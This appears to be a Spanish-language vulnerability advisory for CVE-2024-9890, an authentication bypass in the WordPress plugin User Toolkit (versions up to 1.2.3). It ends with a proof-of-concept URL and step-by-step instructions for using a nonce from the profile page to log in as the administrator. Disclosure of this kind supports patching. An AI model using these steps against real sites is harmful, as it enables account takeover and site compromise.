
User Toolkit <= 1.2.3 - Autenticado (Subscriber+) Omisión de autenticación
User Toolkit <= 1.2.3 - Omisión de autenticación (Suscriptor autenticado+)
El plugin User Toolkit para WordPress es vulnerable a la omisión de autenticación en versiones hasta la 1.2.3 incluida. Esto se debe a una comprobación de capacidades incorrecta en la función 'switchUser'. Esto permite que atacantes autenticados, con permisos de nivel suscriptor y superiores, inicien sesión como cualquier usuario existente en el sitio, como un administrador.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
Inicia sesión con tu usuario. Consulta el código fuente de tu página de perfil para obtener el valor del nonce. Cambia el valor de user_from a tu ID de usuario. Cambia el valor de user_id al ID del administrador. ¡Listo!